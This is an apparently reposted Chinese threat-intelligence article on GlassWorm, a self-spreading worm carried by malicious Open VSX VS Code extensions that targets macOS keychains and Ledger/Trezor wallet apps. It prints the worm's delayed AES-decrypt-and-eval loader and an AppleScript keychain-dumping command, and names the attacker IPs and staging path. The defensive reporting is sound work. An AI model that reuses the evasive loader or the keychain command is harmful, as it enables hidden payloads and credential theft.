文章总结： GlassWorm恶意软件第四代变种转攻macOS，通过OpenVSX扩展传播。其利用Solana区块链构建C2并采用15分钟延迟规避沙箱，能窃取钥匙串密码及木马化硬件钱包应用。用户需警惕来源不明的VSCode插件。 综合评分： 86 文章分类： 恶意软件,威胁情报,终端安全

macOS用户注意！最新恶意软件会攻击硬件钱包应用

Hacking黑白红

2026年1月6日 07:04 安徽

#

自传播恶意软件GlassWorm利用VS Code扩展攻击macOS用户

网络安全研究人员发现GlassWorm恶意软件新变种出现重大策略转变——从Windows系统转向攻击macOS平台。这款自传播蠕虫通过Open VSX市场上的恶意VS Code扩展传播，下载量已突破5万次。

第四代变种引入多项危险特性：加密载荷、硬件钱包木马化功能以及可绕过传统安全扫描工具的沙箱规避技术。自去年10月以来，该威胁组织已展现出极强的适应能力，历经四次迭代升级。

恶意扩展伪装与区块链C2架构

Open VSX市场上已标记三个可疑扩展：pro-svelte-extension、vsce-prettier-pro和full-access-catppuccin-pro-extension，这些扩展通过共享基础设施和加密密钥相互关联。

该恶意软件采用基于Solana区块链的命令与控制(C2)架构，使得传统封堵手段几乎失效。攻击者通过向区块链发布包含base64编码URL的交易备忘录，维持着无法通过传统域名封锁破坏的去中心化控制。研究人员溯源发现IP地址45.32.151.157在第三代攻击中同样被使用，证实威胁组织的延续性。

加密载荷与沙箱规避技术

第四代变种引入了精妙的时间延迟机制逃避自动化安全分析。恶意扩展安装后会精确等待15分钟才执行载荷——这个时间差至关重要，因为多数沙箱环境在5分钟后就会超时终止分析，使得恶意软件在自动化扫描期间表现完全正常。

代码中硬编码了9e5毫秒(即15分钟)的延迟值，用于触发AES-256-CBC加密载荷的解密执行：

setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);

加密载荷被嵌入主扩展文件的第64行，使用硬编码密钥和初始化向量进行加密，且三个恶意扩展的加密参数完全一致，证实为同一威胁组织所为。

macOS定向攻击与硬件钱包威胁

延迟期结束后，恶意软件会从Solana区块链获取当前C2端点并执行接收到的指令。针对macOS的载荷包含：

• 使用AppleScript实现隐蔽执行
• 采用LaunchAgents实现持久化（而非Windows注册表）
• 直接访问macOS钥匙串数据库获取存储的密码凭证：

set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"

该恶意软件还能将硬件钱包应用（Ledger Live和Trezor Suite）替换为木马版本。虽然2025年12月29日测试期间钱包替换功能尚未完全激活，但相关代码框架已构建完成，只待载荷上传。所有窃取数据会暂存在/tmp/ijewf/目录，经压缩后发送至45.32.150.251/p2p服务器供攻击者提取

来源：https://www.freebuf.com/articles/endpoint/464639.html

感谢白帽星空

往期相关回顾

京东集团安全部-急招，年前尽快入职

【招聘】-阿里安全AGI实验室（北京、杭州）

【招聘】-阿里集团安全部招聘安全工程师（渗透攻防）

【招聘-网络安全】蔚来汽车-AI安全工程师（50-60K）

【招聘-网络安全】杭州甲方招人（统招本科以上+工作5年以上）

【快手】安全急招——年前面试年后入职

1.7万“僵尸”账号的饱和攻击：复盘快手直播被黑产击穿的两小时

快手3年前裁掉整个安全团队？

快手员工爆今年裁员10%，游戏部门最多

【抖音】– 网络安全招聘（30-90K*15）

一文读懂-快手12·22攻击事件复盘图解

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Hacking黑白红 《macOS用户注意！最新恶意软件会攻击硬件钱包应用》